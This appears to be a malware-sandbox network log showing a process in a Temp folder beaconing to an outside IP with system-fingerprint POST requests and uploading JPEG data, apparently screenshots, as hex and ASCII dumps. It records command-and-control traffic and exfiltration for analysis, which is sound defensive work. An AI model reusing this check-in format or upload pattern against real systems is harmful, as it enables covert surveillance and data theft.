                                        Aug 29, 2021 22:28:57.615686893 CEST16934OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:57.615931034 CEST16944OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:57.616096020 CEST16947OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:57.651367903 CEST16950OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:57.651402950 CEST16958OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:28:57.651556969 CEST16967OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:28:57.651572943 CEST16972OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:57.686894894 CEST16978OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:57.686924934 CEST16981OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:28:57.687077045 CEST16994OUTData Raw: e1 0a 50 29 45 2d 32 4b 3a 7b 2c 57 d1 bb b0 55 19 c9 3f 43 5d 64 37 b7 97 1a 7b da c1 73 3c b6 48 c1 de 24 90 98 d5 8f 42 40 e0 1e 0f 3e d5 c4 9a ed be 1e fc 41 ff 00 84 13 fb 47 fe 25 7f 6e fb 6f 95 ff 00 2f 1e 56 cd 9b ff 00 d9 6c e7 7f b7 4a
                                        Data Ascii: P)E-2K:{,WU?C]d7{s<H$B@>AG%no/VlJ)j:QI/ntMb^.$N\E:x|nTc#RIUZcN1s^jay'P{l3xD!|8;RIU
                                        Aug 29, 2021 22:28:57.795794964 CEST17041INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:57 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        275192.168.2.45001446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:57.938375950 CEST17042OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:58.010979891 CEST17043INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:57 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        276192.168.2.45001546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:58.157483101 CEST17043OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:58.157567978 CEST17044OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:58.157725096 CEST17054OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:58.157802105 CEST17056OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:58.193156004 CEST17059OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:58.193186045 CEST17065OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:28:58.193351030 CEST17076OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:28:58.193373919 CEST17082OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:58.228740931 CEST17085OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:58.228854895 CEST17088OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:28:58.228923082 CEST17106OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:28:58.336477041 CEST17152INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:58 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        277192.168.2.45001646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:58.227839947 CEST17082OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:58.303807974 CEST17151INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:58 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        278192.168.2.45001746.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:58.529922962 CEST17153OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:58.605307102 CEST17153INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:58 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0
                                        Aug 29, 2021 22:28:58.912298918 CEST17154OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:58.912405014 CEST17154OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:58.912587881 CEST17164OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:58.912724018 CEST17167OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:58.946156025 CEST17169OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:58.946197987 CEST17172OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:28:58.946216106 CEST17175OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:28:58.946254969 CEST17183OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:28:58.946335077 CEST17188OUTData Raw: b3 13 c9 24 f7 34 66 bb 23 b2 4c e4 95 9b 6d 0e f2 d4 f7 a4 31 0f 5a 4e 69 72 6a b4 27 51 3c 9f 7a 3c 93 4b b8 d2 ef 34 59 0e f2 19 e5 35 21 42 2a 5f 33 da 9d e6 0f 4a 2c 85 76 56 c1 f4 a5 c7 b5 58 dc a7 b5 38 04 3d a8 e4 0e 72 a5 15 68 c6 9d 8d
                                        Data Ascii: $4f#Lm1ZNirj'Q<z<K4Y5!B*_3J,vVX8=rh'Mjoy+dCKRy,)l;Qf;SNYQE%(QKLAEPEJ(,!(bbQE)iZ){!i`Z))EIAKE-)j,(SR>Sii:@PE-B
                                        Aug 29, 2021 22:28:58.946373940 CEST17191OUTData Raw: b5 1a 90 b5 c9 78 47 14 e5 4e a2 76 3e 52 ef 5e 95 f0 3d 51 fc 79 2a ba ab 29 b1 93 21 86 47 de 4a f3 5a eb 3e 1e 78 a6 d3 c1 fe 24 7d 4e f2 de 69 e2 36 ef 10 48 b1 92 49 5f 52 38 e0 d7 9d 51 37 06 91 ed 53 69 49 36 7a 94 7e 28 bd be f1 84 70 d8
                                        Data Ascii: xGNv>R^=Qy*)!GJZ>x$}Ni6HI_R8Q7SiI6z~(pI-{d\#8$/exjQUUf 8fg4Rfy^8#TZ#Qu]oIV}+mmkEx[II uH {
                                        Aug 29, 2021 22:28:58.946398020 CEST17193OUTData Raw: 79 27 f7 e9 ff 00 0c 3b 51 fb ff 00 2f eb 53 4a d7 4c f0 e5 d2 68 30 38 d5 22 9b 5c f3 3c 9b 8f 3e 36 48 0f 9c f1 c6 1a 3f 2c 16 fb ab 92 1c 75 24 0e d4 cb af 0f 25 97 84 6d 35 23 a2 eb 37 33 4b 14 c6 7b b8 64 1f 66 b6 74 99 e3 c3 01 11 fe e8 3f
                                        Data Ascii: y';Q/SJLh08"\<>6H?,u$%m5#73K{dft?|uv"DZB:Cdi4[2J dr4.H2Fd4&q>;^.5xWE}m,K]r.wY"5i;\X[o1d:;mcqp
                                        Aug 29, 2021 22:28:59.085366964 CEST17262INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:59 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        279192.168.2.45001846.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:59.046657085 CEST17262OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:59.122509003 CEST17262INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:59 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        28192.168.2.44976346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:22.981399059 CEST4041OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:22.981522083 CEST4041OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:22.981748104 CEST4052OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:22.981930971 CEST4054OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
